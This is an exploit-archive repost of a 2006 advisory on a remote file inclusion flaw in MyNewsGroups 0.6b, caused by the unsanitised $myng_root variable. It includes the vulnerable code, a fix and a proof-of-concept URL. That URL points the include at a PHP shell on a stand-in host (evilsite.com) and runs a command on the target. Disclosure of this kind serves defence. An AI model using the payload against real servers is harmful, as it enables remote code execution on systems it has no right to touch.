Advertisement






MyNewsGroups <= 0.6b (myng_root) Remote Inclusion Vulnerability

CVE Category Price Severity
N/A CWE-N/A N/A N/A
Author Risk Exploitation Type Date
N/A N/A Remote 2006-08-07
CPE
cpe:cpe:/a:mynewsgroups:myng:0.6b
CVSS EPSS EPSSP
CVSS:Not Available 0 0

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080025

Below is a copy:

+--------------------------------------------------------------------

+

+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion

+

+--------------------------------------------------------------------

+

+ Affected Software .: MyNewsGroups :) v. 0.6b

+ Venedor ...........: http://mynewsgroups.sourceforge.net

+ Class .............: Remote File Inclusion

+ Risk ..............: high (Remote File Execution)

+ Found by ..........: Philipp Niedziela

+ Original advisory .: http://www.bb-pcsecurity.de/

+ Contact ...........: webmaster[at]bb-pcsecurity[.]de

+

+--------------------------------------------------------------------

+

+ Code /lib/tree/layersmenue.inc.php:

+

+ .....

+ <?php

+ // PHP Layers Menu 2.3.5 (C) 2001-2003 Marco Pratesi (marco at telug dot

it)

+

+ require_once $myng_root."/pear/PEAR.php";

+ .....

+

+--------------------------------------------------------------------

+

+ $myng_root is not properly sanitized before being used.

+ The bug is in the "PHP Layers Menu 2.3.5" Package for MyNewsGroups.

+

+--------------------------------------------------------------------

+

+ Solution:

+ Add this line to your php-file:

+

+ $myng_root ="bla/bla" //Your root path

+

+--------------------------------------------------------------------

+ PoC:

+ Place a PHPShell on a remote location:

+ http://evilsite.com/pear/PEAR.php/index.html

+

+

http://[target]/lib/tree/layersmenu.inc.php?myng_root=http://evilsite.co
m/P

EAR.php/&cmd=ls

+

+--------------------------------------------------------------------

+

+ Greets:

+ Krini&Lenni

+

+-------------------------[ E O F ]----------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum